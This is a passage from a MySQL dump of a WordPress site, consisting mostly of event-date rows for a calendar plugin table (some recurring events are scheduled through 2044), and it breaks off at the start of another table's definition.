133800,'publish',1),(1021337,268461,'2027-01-16','2027-01-16',1800106200,1800109800,'publish',1),(1021336,268461,'2026-12-19','2026-12-19',1797687000,1797690600,'publish',1),(1021335,268461,'2026-11-21','2026-11-21',1795267800,1795271400,'publish',1),(1021334,268461,'2026-10-17','2026-10-17',1792243800,1792247400,'publish',1),(1021333,268461,'2026-09-19','2026-09-19',1789824600,1789828200,'publish',1),(1021332,268461,'2026-08-15','2026-08-15',1786800600,1786804200,'publish',1),(1021331,268461,'2026-07-18','2026-07-18',1784381400,1784385000,'publish',1),(1021330,268461,'2026-06-20','2026-06-20',1781962200,1781965800,'publish',1),(1021329,268461,'2026-05-16','2026-05-16',1778938200,1778941800,'publish',1),(1021328,268461,'2026-04-18','2026-04-18',1776519000,1776522600,'publish',1),(1021327,268461,'2026-03-21','2026-03-21',1774099800,1774103400,'publish',1),(1021326,268461,'2026-02-21','2026-02-21',1771680600,1771684200,'publish',1),(1021325,268461,'2026-01-17','2026-01-17',1768656600,1768660200,'publish',1),(1021324,268461,'2025-12-20','2025-12-20',1766237400,1766241000,'publish',1),(1021323,268461,'2025-11-15','2025-11-15',1763213400,1763217000,'publish',1),(1021322,268461,'2025-10-18','2025-10-18',1760794200,1760797800,'publish',1),(1021321,268461,'2025-09-20','2025-09-20',1758375000,1758378600,'publish',1),(1021320,268461,'2025-08-16','2025-08-16',1755351000,1755354600,'publish',1),(1021319,268461,'2025-07-19','2025-07-19',1752931800,1752935400,'publish',1),(1021318,268461,'2025-06-21','2025-06-21',1750512600,1750516200,'publish',1),(1021317,268461,'2025-05-17','2025-05-17',1747488600,1747492200,'publish',1),(1021316,268461,'2025-04-19','2025-04-19',1745069400,1745073000,'publish',1),(1021315,268461,'2025-03-15','2025-03-15',1742045400,1742049000,'publish',1),(1021314,268461,'2025-02-15','2025-02-15',1739626200,1739629800,'publish',1),(1021313,268461,'2025-01-18','2025-01-18',1737207000,1737210600,'publish',1),(1021312,268461,'2024-12-21','2024-12-21',1734787800,1734791400,'publish',1),(1021311,268461,'2024-11-16','2024-11-16',1731763800,1731767400,'publish',1),(1021310,268461,'2024-10-19','2024-10-19',1729344600,1729348200,'publish',1),(1021309,268461,'2024-09-21','2024-09-21',1726925400,1726929000,'publish',1),(1021308,268461,'2024-08-17','2024-08-17',1723901400,1723905000,'publish',1),(1021307,268461,'2024-07-20','2024-07-20',1721482200,1721485800,'publish',1),(1021306,268461,'2024-06-15','2024-06-15',1718458200,1718461800,'publish',1),(1021305,268461,'2024-05-18','2024-05-18',1716039000,1716042600,'publish',1),(1021304,268461,'2024-04-20','2024-04-20',1713619800,1713623400,'publish',1),(1021303,268461,'2024-03-16','2024-03-16',1710595800,1710599400,'publish',1),(1021302,268461,'2024-02-17','2024-02-17',1708176600,1708180200,'publish',1),(1021301,268461,'2024-01-20','2024-01-20',1705757400,1705761000,'publish',1),(1021300,268461,'2023-12-16','2023-12-16',1702733400,1702737000,'publish',1),(1021299,268461,'2023-11-18','2023-11-18',1700314200,1700317800,'publish',1),(1021298,268461,'2023-10-21','2023-10-21',1697895000,1697898600,'publish',1),(1021297,268461,'2023-09-16','2023-09-16',1694871000,1694874600,'publish',1),(1021296,268461,'2023-08-19','2023-08-19',1692451800,1692455400,'publish',1),(1021295,268461,'2023-07-15','2023-07-15',1689427800,1689431400,'publish',1),(1021294,268461,'2023-06-17','2023-06-17',1687008600,1687012200,'publish',1),(1021293,268461,'2023-05-20','2023-05-20',1684589400,1684593000,'publish',1),(127824,268726,'2027-08-15','2027-08-15',1818325800,1818372600,'publish',1),(1210318,268730,'2023-09-10','2023-09-10',1694341800,1694345400,'publish',1),(1210348,268736,'2023-08-06','2023-08-06',1691312400,1691323200,'publish',1),(1210347,268736,'2023-08-05','2023-08-05',1691225100,1691272800,'publish',1),(1210346,268743,'2023-07-23','2023-07-23',1690108200,1690111800,'publish',1),(1210345,268745,'2023-07-31','2023-07-31',1690830000,1690833600,'publish',1),(1210344,268747,'2023-07-09','2023-07-09',1688898600,1688902200,'publish',1),(1210343,268751,'2023-07-12','2023-07-12',1689157800,1689161400,'publish',1),(1210342,268752,'2023-07-23','2023-07-23',1690108200,1690111800,'publish',1),(1210341,268753,'2023-07-05','2023-07-05',1688583600,1688587200,'publish',1),(1210340,268759,'2023-07-12','2023-07-12',1689186600,1689190200,'publish',1),(1210339,268762,'2023-07-20','2023-07-20',1689879600,1689883200,'publish',1),(1210338,268765,'2023-07-11','2023-07-11',1689102000,1689105600,'publish',1),(1210337,268794,'2023-09-16','2023-09-16',1694869200,1694872800,'publish',1),(1210336,268797,'2023-08-13','2023-08-13',1691931600,1691937000,'publish',1),(1210335,268835,'2023-08-09','2023-08-09',1691586000,1691591400,'publish',1),(1210334,268837,'2023-08-16','2023-08-16',1692190800,1692196200,'publish',1),(1210333,268838,'2023-08-23','2023-08-23',1692795600,1692801000,'publish',1),(1210332,268839,'2023-08-09','2023-08-09',1691577000,1691580600,'publish',1),(582909,268843,'2023-08-13','2023-08-13',1691922600,1691926200,'publish',1),(1210330,268844,'2023-08-27','2023-08-27',1693132200,1693135800,'publish',1),(1210329,268846,'2023-08-20','2023-08-20',1692527400,1692531000,'publish',1),(1210328,268848,'2023-08-31','2023-08-31',1693506600,1693512900,'publish',1),(1210327,268859,'2023-08-31','2023-08-31',1693506600,1693512900,'publish',1),(1210326,268860,'2023-08-27','2023-08-27',1693132200,1693135800,'publish',1),(1210325,268871,'2023-08-09','2023-08-09',1691605800,1691609400,'publish',1),(1210324,268874,'2023-08-15','2023-08-15',1692126000,1692129600,'publish',1),(1210323,268876,'2023-08-17','2023-08-17',1692298800,1692302400,'publish',1),(1210322,268880,'2023-08-13','2023-08-13',1691935200,1691940600,'publish',1),(1210320,268914,'2023-09-17','2023-09-17',1694955600,1694961000,'publish',1),(1210319,268934,'2023-09-06','2023-09-06',1694026800,1694030400,'publish',1),(1210317,268940,'2023-09-03','2023-09-03',1693737000,1693740600,'publish',1),(1210316,268947,'2023-09-10','2023-09-10',1694341800,1694345400,'publish',1),(1210315,268950,'2023-09-24','2023-09-24',1695551400,1695555000,'publish',1),(1210314,268953,'2023-09-21','2023-09-21',1695322800,1695326400,'publish',1),(1210313,268958,'2023-10-21','2023-10-22',1697875200,1697997600,'publish',1),(582911,268962,'2023-08-31','2023-08-31',1693468800,1693504800,'publish',1),(1210312,268963,'2023-09-13','2023-09-13',1694601000,1694604600,'publish',1),(815937,268965,'2024-09-01','2024-09-01',1725186600,1725190200,'publish',1),(815936,268965,'2024-08-04','2024-08-04',1722767400,1722771000,'publish',1),(815935,268965,'2024-07-07','2024-07-07',1720348200,1720351800,'publish',1),(815934,268965,'2024-06-02','2024-06-02',1717324200,1717327800,'publish',1),(815933,268965,'2024-05-05','2024-05-05',1714905000,1714908600,'publish',1),(815932,268965,'2024-04-07','2024-04-07',1712485800,1712489400,'publish',1),(815931,268965,'2024-03-03','2024-03-03',1709461800,1709465400,'publish',1),(815930,268965,'2024-02-04','2024-02-04',1707042600,1707046200,'publish',1),(815929,268965,'2024-01-07','2024-01-07',1704623400,1704627000,'publish',1),(815928,268965,'2023-12-03','2023-12-03',1701599400,1701603000,'publish',1),(815927,268965,'2023-11-05','2023-11-05',1699180200,1699183800,'publish',1),(815926,268965,'2023-10-01','2023-10-01',1696156200,1696159800,'publish',1),(1210311,268972,'2023-09-13','2023-09-13',1694629800,1694633400,'publish',1),(1210310,269018,'2023-09-24','2023-09-24',1695551400,1695555000,'publish',1),(1210309,269107,'2023-10-01','2023-10-01',1696156200,1696159800,'publish',1),(1210308,269109,'2023-10-08','2023-10-08',1696761000,1696764600,'publish',1),(1210307,269111,'2023-10-04','2023-10-04',1696446000,1696449600,'publish',1),(1210306,269118,'2023-10-28','2023-10-28',1698503400,1698507900,'publish',1),(1210288,269323,'2023-11-26','2023-11-26',1700994600,1700998200,'publish',1),(1059557,269324,'2044-06-26','2044-06-26',2350549800,2350553400,'publish',1),(1059556,269324,'2044-05-22','2044-05-22',2347525800,2347529400,'publish',1),(1059555,269324,'2044-04-24','2044-04-24',2345106600,2345110200,'publish',1),(1059554,269324,'2044-03-27','2044-03-27',2342687400,2342691000,'publish',1),(1059553,269324,'2044-02-28','2044-02-28',2340268200,2340271800,'publish',1),(1059552,269324,'2044-01-24','2044-01-24',2337244200,2337247800,'publish',1),(1210301,269143,'2023-10-08','2023-10-08',1696761000,1696764600,'publish',1),(1210304,269140,'2023-10-08','2023-10-08',1696759200,1696784400,'publish',1),(1210303,269140,'2023-10-07','2023-10-07',1696672800,1696698000,'publish',1),(1210302,269140,'2023-10-06','2023-10-06',1696586400,1696611600,'publish',1),(1210300,269144,'2023-10-15','2023-10-15',1697365800,1697369400,'publish',1),(816549,269146,'2023-10-06','2023-10-06',1696586400,1696611600,'publish',1),(816550,269146,'2023-10-07','2023-10-07',1696672800,1696698000,'publish',1),(816551,269146,'2023-10-08','2023-10-08',1696759200,1696784400,'publish',1),(1210299,269147,'2023-10-29','2023-10-29',1698575400,1698579000,'publish',1),(1210298,269149,'2023-10-30','2023-10-30',1698690600,1698694200,'publish',1),(1210297,269160,'2023-10-12','2023-10-12',1697135400,1697139000,'publish',1),(1210296,269184,'2023-10-22','2023-10-22',1697970600,1697974200,'publish',1),(1210295,269259,'2023-11-05','2023-11-05',1699180200,1699227000,'publish',1),(1210294,269260,'2023-11-12','2023-11-12',1699785000,1699788600,'publish',1),(1210293,269262,'2023-11-16','2023-11-16',1700161200,1700164800,'publish',1),(1210292,269265,'2023-11-18','2023-11-18',1700312400,1700316000,'publish',1),(1210291,269268,'2023-11-01','2023-11-01',1698865200,1698868800,'publish',1),(1210290,269272,'2023-11-19','2023-11-19',1700389800,1700393400,'publish',1),(1210289,269301,'2023-11-18','2023-11-18',1700314200,1700317800,'publish',1),(1059551,269324,'2043-12-27','2043-12-27',2334825000,2334828600,'publish',1),(1059550,269324,'2043-11-22','2043-11-22',2331801000,2331804600,'publish',1),(1059549,269324,'2043-10-25','2043-10-25',2329381800,2329385400,'publish',1),(1059548,269324,'2043-09-27','2043-09-27',2326962600,2326966200,'publish',1),(1059547,269324,'2043-08-23','2043-08-23',2323938600,2323942200,'publish',1),(1059546,269324,'2043-07-26','2043-07-26',2321519400,2321523000,'publish',1),(1059545,269324,'2043-06-28','2043-06-28',2319100200,2319103800,'publish',1),(1059544,269324,'2043-05-24','2043-05-24',2316076200,2316079800,'publish',1),(1059543,269324,'2043-04-26','2043-04-26',2313657000,2313660600,'publish',1),(1059542,269324,'2043-03-22','2043-03-22',2310633000,2310636600,'publish',1),(1059541,269324,'2043-02-22','2043-02-22',2308213800,2308217400,'publish',1),(1059540,269324,'2043-01-25','2043-01-25',2305794600,2305798200,'publish',1),(1059539,269324,'2042-12-28','2042-12-28',2303375400,2303379000,'publish',1),(1059538,269324,'2042-11-23','2042-11-23',2300351400,2300355000,'publish',1),(1059537,269324,'2042-10-26','2042-10-26',2297932200,2297935800,'publish',1),(1059536,269324,'2042-09-28','2042-09-28',2295513000,2295516600,'publish',1),(1059535,269324,'2042-08-24','2042-08-24',2292489000,2292492600,'publish',1),(1059534,269324,'2042-07-27','2042-07-27',2290069800,2290073400,'publish',1),(1059533,269324,'2042-06-22','2042-06-22',2287045800,2287049400,'publish',1),(1059532,269324,'2042-05-25','2042-05-25',2284626600,2284630200,'publish',1),(1059531,269324,'2042-04-27','2042-04-27',2282207400,2282211000,'publish',1),(1059530,269324,'2042-03-23','2042-03-23',2279183400,2279187000,'publish',1),(1059529,269324,'2042-02-23','2042-02-23',2276764200,2276767800,'publish',1),(1059528,269324,'2042-01-26','2042-01-26',2274345000,2274348600,'publish',1),(1059527,269324,'2041-12-22','2041-12-22',2271321000,2271324600,'publish',1),(1059526,269324,'2041-11-24','2041-11-24',2268901800,2268905400,'publish',1),(1059525,269324,'2041-10-27','2041-10-27',2266482600,2266486200,'publish',1),(1059524,269324,'2041-09-22','2041-09-22',2263458600,2263462200,'publish',1),(1059523,269324,'2041-08-25','2041-08-25',2261039400,2261043000,'publish',1),(1059522,269324,'2041-07-28','2041-07-28',2258620200,2258623800,'publish',1),(1059521,269324,'2041-06-23','2041-06-23',2255596200,2255599800,'publish',1),(1059520,269324,'2041-05-26','2041-05-26',2253177000,2253180600,'publish',1),(1059519,269324,'2041-04-28','2041-04-28',2250757800,2250761400,'publish',1),(1059518,269324,'2041-03-24','2041-03-24',2247733800,2247737400,'publish',1),(1059517,269324,'2041-02-24','2041-02-24',2245314600,2245318200,'publish',1),(1059516,269324,'2041-01-27','2041-01-27',2242895400,2242899000,'publish',1),(1059515,269324,'2040-12-23','2040-12-23',2239871400,2239875000,'publish',1),(1059514,269324,'2040-11-25','2040-11-25',2237452200,2237455800,'publish',1),(1059513,269324,'2040-10-28','2040-10-28',2235033000,2235036600,'publish',1),(1059512,269324,'2040-09-23','2040-09-23',2232009000,2232012600,'publish',1),(1059511,269324,'2040-08-26','2040-08-26',2229589800,2229593400,'publish',1),(1059510,269324,'2040-07-22','2040-07-22',2226565800,2226569400,'publish',1),(1059509,269324,'2040-06-24','2040-06-24',2224146600,2224150200,'publish',1),(1059508,269324,'2040-05-27','2040-05-27',2221727400,2221731000,'publish',1),(1059507,269324,'2040-04-22','2040-04-22',2218703400,2218707000,'publish',1),(1059506,269324,'2040-03-25','2040-03-25',2216284200,2216287800,'publish',1),(1059505,269324,'2040-02-26','2040-02-26',2213865000,2213868600,'publish',1),(1059504,269324,'2040-01-22','2040-01-22',2210841000,2210844600,'publish',1),(1059503,269324,'2039-12-25','2039-12-25',2208421800,2208425400,'publish',1),(1059502,269324,'2039-11-27','2039-11-27',2206002600,2206006200,'publish',1),(1059501,269324,'2039-10-23','2039-10-23',2202978600,2202982200,'publish',1),(1059500,269324,'2039-09-25','2039-09-25',2200559400,2200563000,'publish',1),(1059499,269324,'2039-08-28','2039-08-28',2198140200,2198143800,'publish',1),(1059498,269324,'2039-07-24','2039-07-24',2195116200,2195119800,'publish',1),(1059497,269324,'2039-06-26','2039-06-26',2192697000,2192700600,'publish',1),(1059496,269324,'2039-05-22','2039-05-22',2189673000,2189676600,'publish',1),(1059495,269324,'2039-04-24','2039-04-24',2187253800,2187257400,'publish',1),(1059494,269324,'2039-03-27','2039-03-27',2184834600,2184838200,'publish',1),(1059493,269324,'2039-02-27','2039-02-27',2182415400,2182419000,'publish',1),(1059492,269324,'2039-01-23','2039-01-23',2179391400,2179395000,'publish',1),(1059491,269324,'2038-12-26','2038-12-26',2176972200,2176975800,'publish',1),(1059490,269324,'2038-11-28','2038-11-28',2174553000,2174556600,'publish',1),(1059489,269324,'2038-10-24','2038-10-24',2171529000,2171532600,'publish',1),(1059488,269324,'2038-09-26','2038-09-26',2169109800,2169113400,'publish',1),(1059487,269324,'2038-08-22','2038-08-22',2166085800,2166089400,'publish',1),(1059486,269324,'2038-07-25','2038-07-25',2163666600,2163670200,'publish',1),(1059485,269324,'2038-06-27','2038-06-27',2161247400,2161251000,'publish',1),(1059484,269324,'2038-05-23','2038-05-23',2158223400,2158227000,'publish',1),(1059483,269324,'2038-04-25','2038-04-25',2155804200,2155807800,'publish',1),(1059482,269324,'2038-03-28','2038-03-28',2153385000,2153388600,'publish',1),(1059481,269324,'2038-02-28','2038-02-28',2150965800,2150969400,'publish',1),(1059480,269324,'2038-01-24','2038-01-24',2147941800,2147945400,'publish',1),(1059479,269324,'2037-12-27','2037-12-27',2145522600,2145526200,'publish',1),(1059478,269324,'2037-11-22','2037-11-22',2142498600,2142502200,'publish',1),(1059477,269324,'2037-10-25','2037-10-25',2140079400,2140083000,'publish',1),(1059476,269324,'2037-09-27','2037-09-27',2137660200,2137663800,'publish',1),(1059475,269324,'2037-08-23','2037-08-23',2134636200,2134639800,'publish',1),(1059474,269324,'2037-07-26','2037-07-26',2132217000,2132220600,'publish',1),(1059473,269324,'2037-06-28','2037-06-28',2129797800,2129801400,'publish',1),(1059472,269324,'2037-05-24','2037-05-24',2126773800,2126777400,'publish',1),(1059471,269324,'2037-04-26','2037-04-26',2124354600,2124358200,'publish',1),(1059470,269324,'2037-03-22','2037-03-22',2121330600,2121334200,'publish',1),(1059469,269324,'2037-02-22','2037-02-22',2118911400,2118915000,'publish',1),(1059468,269324,'2037-01-25','2037-01-25',2116492200,2116495800,'publish',1),(1059467,269324,'2036-12-28','2036-12-28',2114073000,2114076600,'publish',1),(1059466,269324,'2036-11-23','2036-11-23',2111049000,2111052600,'publish',1),(1059465,269324,'2036-10-26','2036-10-26',2108629800,2108633400,'publish',1),(1059464,269324,'2036-09-28','2036-09-28',2106210600,2106214200,'publish',1),(1059463,269324,'2036-08-24','2036-08-24',2103186600,2103190200,'publish',1),(1059462,269324,'2036-07-27','2036-07-27',2100767400,2100771000,'publish',1),(1059461,269324,'2036-06-22','2036-06-22',2097743400,2097747000,'publish',1),(1059460,269324,'2036-05-25','2036-05-25',2095324200,2095327800,'publish',1),(1059459,269324,'2036-04-27','2036-04-27',2092905000,2092908600,'publish',1),(1059458,269324,'2036-03-23','2036-03-23',2089881000,2089884600,'publish',1),(1059457,269324,'2036-02-24','2036-02-24',2087461800,2087465400,'publish',1),(1059456,269324,'2036-01-27','2036-01-27',2085042600,2085046200,'publish',1),(1059455,269324,'2035-12-23','2035-12-23',2082018600,2082022200,'publish',1),(1059454,269324,'2035-11-25','2035-11-25',2079599400,2079603000,'publish',1),(1059453,269324,'2035-10-28','2035-10-28',2077180200,2077183800,'publish',1),(1059452,269324,'2035-09-23','2035-09-23',2074156200,2074159800,'publish',1),(1059451,269324,'2035-08-26','2035-08-26',2071737000,2071740600,'publish',1),(1059450,269324,'2035-07-22','2035-07-22',2068713000,2068716600,'publish',1),(1059449,269324,'2035-06-24','2035-06-24',2066293800,2066297400,'publish',1),(1059448,269324,'2035-05-27','2035-05-27',2063874600,2063878200,'publish',1),(1059447,269324,'2035-04-22','2035-04-22',2060850600,2060854200,'publish',1),(1059446,269324,'2035-03-25','2035-03-25',2058431400,2058435000,'publish',1),(1059445,269324,'2035-02-25','2035-02-25',2056012200,2056015800,'publish',1),(1059444,269324,'2035-01-28','2035-01-28',2053593000,2053596600,'publish',1),(1059443,269324,'2034-12-24','2034-12-24',2050569000,2050572600,'publish',1),(1059442,269324,'2034-11-26','2034-11-26',2048149800,2048153400,'publish',1),(1059441,269324,'2034-10-22','2034-10-22',2045125800,2045129400,'publish',1),(1059440,269324,'2034-09-24','2034-09-24',2042706600,2042710200,'publish',1),(1059439,269324,'2034-08-27','2034-08-27',2040287400,2040291000,'publish',1),(1059438,269324,'2034-07-23','2034-07-23',2037263400,2037267000,'publish',1),(1059437,269324,'2034-06-25','2034-06-25',2034844200,2034847800,'publish',1),(1059436,269324,'2034-05-28','2034-05-28',2032425000,2032428600,'publish',1),(1059435,269324,'2034-04-23','2034-04-23',2029401000,2029404600,'publish',1),(1059434,269324,'2034-03-26','2034-03-26',2026981800,2026985400,'publish',1),(1059433,269324,'2034-02-26','2034-02-26',2024562600,2024566200,'publish',1),(1059432,269324,'2034-01-22','2034-01-22',2021538600,2021542200,'publish',1),(1059431,269324,'2033-12-25','2033-12-25',2019119400,2019123000,'publish',1),(1059430,269324,'2033-11-27','2033-11-27',2016700200,2016703800,'publish',1),(1059429,269324,'2033-10-23','2033-10-23',2013676200,2013679800,'publish',1),(1059428,269324,'2033-09-25','2033-09-25',2011257000,2011260600,'publish',1),(1059427,269324,'2033-08-28','2033-08-28',2008837800,2008841400,'publish',1),(1059426,269324,'2033-07-24','2033-07-24',2005813800,2005817400,'publish',1),(1059425,269324,'2033-06-26','2033-06-26',2003394600,2003398200,'publish',1),(1059424,269324,'2033-05-22','2033-05-22',2000370600,2000374200,'publish',1),(1059423,269324,'2033-04-24','2033-04-24',1997951400,1997955000,'publish',1),(1059422,269324,'2033-03-27','2033-03-27',1995532200,1995535800,'publish',1),(1059421,269324,'2033-02-27','2033-02-27',1993113000,1993116600,'publish',1),(1059420,269324,'2033-01-23','2033-01-23',1990089000,1990092600,'publish',1),(1059419,269324,'2032-12-26','2032-12-26',1987669800,1987673400,'publish',1),(1059418,269324,'2032-11-28','2032-11-28',1985250600,1985254200,'publish',1),(1059417,269324,'2032-10-24','2032-10-24',1982226600,1982230200,'publish',1),(1059416,269324,'2032-09-26','2032-09-26',1979807400,1979811000,'publish',1),(1059415,269324,'2032-08-22','2032-08-22',1976783400,1976787000,'publish',1),(1059414,269324,'2032-07-25','2032-07-25',1974364200,1974367800,'publish',1),(1059413,269324,'2032-06-27','2032-06-27',1971945000,1971948600,'publish',1),(1059412,269324,'2032-05-23','2032-05-23',1968921000,1968924600,'publish',1),(1059411,269324,'2032-04-25','2032-04-25',1966501800,1966505400,'publish',1),(1059410,269324,'2032-03-28','2032-03-28',1964082600,1964086200,'publish',1),(1059409,269324,'2032-02-22','2032-02-22',1961058600,1961062200,'publish',1),(1059408,269324,'2032-01-25','2032-01-25',1958639400,1958643000,'publish',1),(1059407,269324,'2031-12-28','2031-12-28',1956220200,1956223800,'publish',1),(1059406,269324,'2031-11-23','2031-11-23',1953196200,1953199800,'publish',1),(1059405,269324,'2031-10-26','2031-10-26',1950777000,1950780600,'publish',1),(1059404,269324,'2031-09-28','2031-09-28',1948357800,1948361400,'publish',1),(1059403,269324,'2031-08-24','2031-08-24',1945333800,1945337400,'publish',1),(1059402,269324,'2031-07-27','2031-07-27',1942914600,1942918200,'publish',1),(1059401,269324,'2031-06-22','2031-06-22',1939890600,1939894200,'publish',1),(1059400,269324,'2031-05-25','2031-05-25',1937471400,1937475000,'publish',1),(1059399,269324,'2031-04-27','2031-04-27',1935052200,1935055800,'publish',1),(1059398,269324,'2031-03-23','2031-03-23',1932028200,1932031800,'publish',1),(1059397,269324,'2031-02-23','2031-02-23',1929609000,1929612600,'publish',1),(1059396,269324,'2031-01-26','2031-01-26',1927189800,1927193400,'publish',1),(1059395,269324,'2030-12-22','2030-12-22',1924165800,1924169400,'publish',1),(1059394,269324,'2030-11-24','2030-11-24',1921746600,1921750200,'publish',1),(1059393,269324,'2030-10-27','2030-10-27',1919327400,1919331000,'publish',1),(1059392,269324,'2030-09-22','2030-09-22',1916303400,1916307000,'publish',1),(1059391,269324,'2030-08-25','2030-08-25',1913884200,1913887800,'publish',1),(1059390,269324,'2030-07-28','2030-07-28',1911465000,1911468600,'publish',1),(1059389,269324,'2030-06-23','2030-06-23',1908441000,1908444600,'publish',1),(1059388,269324,'2030-05-26','2030-05-26',1906021800,1906025400,'publish',1),(1059387,269324,'2030-04-28','2030-04-28',1903602600,1903606200,'publish',1),(1059386,269324,'2030-03-24','2030-03-24',1900578600,1900582200,'publish',1),(1059385,269324,'2030-02-24','2030-02-24',1898159400,1898163000,'publish',1),(1059384,269324,'2030-01-27','2030-01-27',1895740200,1895743800,'publish',1),(1059383,269324,'2029-12-23','2029-12-23',1892716200,1892719800,'publish',1),(1059382,269324,'2029-11-25','2029-11-25',1890297000,1890300600,'publish',1),(1059381,269324,'2029-10-28','2029-10-28',1887877800,1887881400,'publish',1),(1059380,269324,'2029-09-23','2029-09-23',1884853800,1884857400,'publish',1),(1059379,269324,'2029-08-26','2029-08-26',1882434600,1882438200,'publish',1),(1059378,269324,'2029-07-22','2029-07-22',1879410600,1879414200,'publish',1),(1059377,269324,'2029-06-24','2029-06-24',1876991400,1876995000,'publish',1),(1059376,269324,'2029-05-27','2029-05-27',1874572200,1874575800,'publish',1),(1059375,269324,'2029-04-22','2029-04-22',1871548200,1871551800,'publish',1),(1059374,269324,'2029-03-25','2029-03-25',1869129000,1869132600,'publish',1),(1059373,269324,'2029-02-25','2029-02-25',1866709800,1866713400,'publish',1),(1059372,269324,'2029-01-28','2029-01-28',1864290600,1864294200,'publish',1),(1059371,269324,'2028-12-24','2028-12-24',1861266600,1861270200,'publish',1),(1059370,269324,'2028-11-26','2028-11-26',1858847400,1858851000,'publish',1),(1059369,269324,'2028-10-22','2028-10-22',1855823400,1855827000,'publish',1),(1059368,269324,'2028-09-24','2028-09-24',1853404200,1853407800,'publish',1),(1059367,269324,'2028-08-27','2028-08-27',1850985000,1850988600,'publish',1),(1059366,269324,'2028-07-23','2028-07-23',1847961000,1847964600,'publish',1),(1059365,269324,'2028-06-25','2028-06-25',1845541800,1845545400,'publish',1),(1059364,269324,'2028-05-28','2028-05-28',1843122600,1843126200,'publish',1),(1059363,269324,'2028-04-23','2028-04-23',1840098600,1840102200,'publish',1),(1059362,269324,'2028-03-26','2028-03-26',1837679400,1837683000,'publish',1),(1059361,269324,'2028-02-27','2028-02-27',1835260200,1835263800,'publish',1),(1059360,269324,'2028-01-23','2028-01-23',1832236200,1832239800,'publish',1),(1059359,269324,'2027-12-26','2027-12-26',1829817000,1829820600,'publish',1),(1059358,269324,'2027-11-28','2027-11-28',1827397800,1827401400,'publish',1),(1059357,269324,'2027-10-24','2027-10-24',1824373800,1824377400,'publish',1),(1059356,269324,'2027-09-26','2027-09-26',1821954600,1821958200,'publish',1),(1059355,269324,'2027-08-22','2027-08-22',1818930600,1818934200,'publish',1),(1059354,269324,'2027-07-25','2027-07-25',1816511400,1816515000,'publish',1),(1059353,269324,'2027-06-27','2027-06-27',1814092200,1814095800,'publish',1),(1059352,269324,'2027-05-23','2027-05-23',1811068200,1811071800,'publish',1),(1059351,269324,'2027-04-25','2027-04-25',1808649000,1808652600,'publish',1),(1059350,269324,'2027-03-28','2027-03-28',1806229800,1806233400,'publish',1),(1059349,269324,'2027-02-28','2027-02-28',1803810600,1803814200,'publish',1),(1059348,269324,'2027-01-24','2027-01-24',1800786600,1800790200,'publish',1),(1059347,269324,'2026-12-27','2026-12-27',1798367400,1798371000,'publish',1),(1059346,269324,'2026-11-22','2026-11-22',1795343400,1795347000,'publish',1),(1059345,269324,'2026-10-25','2026-10-25',1792924200,1792927800,'publish',1),(1059344,269324,'2026-09-27','2026-09-27',1790505000,1790508600,'publish',1),(1059343,269324,'2026-08-23','2026-08-23',1787481000,1787484600,'publish',1),(1059342,269324,'2026-07-26','2026-07-26',1785061800,1785065400,'publish',1),(1059341,269324,'2026-06-28','2026-06-28',1782642600,1782646200,'publish',1),(1059340,269324,'2026-05-24','2026-05-24',1779618600,1779622200,'publish',1),(1059339,269324,'2026-04-26','2026-04-26',1777199400,1777203000,'publish',1),(1059338,269324,'2026-03-22','2026-03-22',1774175400,1774179000,'publish',1),(1059337,269324,'2026-02-22','2026-02-22',1771756200,1771759800,'publish',1),(1059336,269324,'2026-01-25','2026-01-25',1769337000,1769340600,'publish',1),(1059335,269324,'2025-12-28','2025-12-28',1766917800,1766921400,'publish',1),(1059334,269324,'2025-11-23','2025-11-23',1763893800,1763897400,'publish',1),(1059333,269324,'2025-10-26','2025-10-26',1761474600,1761478200,'publish',1),(1059332,269324,'2025-09-28','2025-09-28',1759055400,1759059000,'publish',1),(1059331,269324,'2025-08-24','2025-08-24',1756031400,1756035000,'publish',1),(1059330,269324,'2025-07-27','2025-07-27',1753612200,1753615800,'publish',1),(1059329,269324,'2025-06-22','2025-06-22',1750588200,1750591800,'publish',1),(1059328,269324,'2025-05-25','2025-05-25',1748169000,1748172600,'publish',1),(1059327,269324,'2025-04-27','2025-04-27',1745749800,1745753400,'publish',1),(1059326,269324,'2025-03-23','2025-03-23',1742725800,1742729400,'publish',1),(1059325,269324,'2025-02-23','2025-02-23',1740306600,1740310200,'publish',1),(1059324,269324,'2025-01-26','2025-01-26',1737887400,1737891000,'publish',1),(1059323,269324,'2024-12-22','2024-12-22',1734863400,1734867000,'publish',1),(1059322,269324,'2024-11-24','2024-11-24',1732444200,1732447800,'publish',1),(1059321,269324,'2024-10-27','2024-10-27',1730025000,1730028600,'publish',1),(1059320,269324,'2024-09-22','2024-09-22',1727001000,1727004600,'publish',1),(1059319,269324,'2024-08-25','2024-08-25',1724581800,1724585400,'publish',1),(1059318,269324,'2024-07-28','2024-07-28',1722162600,1722166200,'publish',1),(1059317,269324,'2024-06-23','2024-06-23',1719138600,1719142200,'publish',1),(1059316,269324,'2024-05-26','2024-05-26',1716719400,1716723000,'publish',1),(1059315,269324,'2024-04-28','2024-04-28',1714300200,1714303800,'publish',1),(1059314,269324,'2024-03-24','2024-03-24',1711276200,1711279800,'publish',1),(1059313,269324,'2024-02-25','2024-02-25',1708857000,1708860600,'publish',1),(1059312,269324,'2024-01-28','2024-01-28',1706437800,1706441400,'publish',1),(1059311,269324,'2023-12-24','2023-12-24',1703413800,1703417400,'publish',1),(1059310,269324,'2023-11-26','2023-11-26',1700994600,1700998200,'publish',1),(1210287,269326,'2023-11-12','2023-11-12',1699785000,1699788600,'publish',1),(1059564,269329,'2022-12-10','2022-12-10',1670670000,1670673600,'publish',1),(1210286,269330,'2023-11-19','2023-11-19',1700389800,1700393400,'publish',1),(1210285,269340,'2023-11-15','2023-11-15',1700073000,1700076600,'publish',1),(1210284,269392,'2023-12-06','2023-12-06',1701889200,1701892800,'publish',1),(1210622,269412,'2023-12-10','2023-12-10',1702204200,1702207800,'publish',1),(1210626,269416,'2023-12-03','2023-12-03',1701599400,1701603000,'publish',1),(1179221,269387,'2023-11-16','2024-01-31',1700121600,1706724000,'publish',1);
/*!40000 ALTER TABLE `wpcl_mec_dates` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_mec_dates` with 1536 row(s)
--

--
-- Table structure for table `wpcl_cf_pro_messages`
--

DROP TABLE IF EXISTS `wpcl_cf_pro_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_cf_pro_messages` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `cfp_id` bigint(20) unsigned DEFAULT NULL,
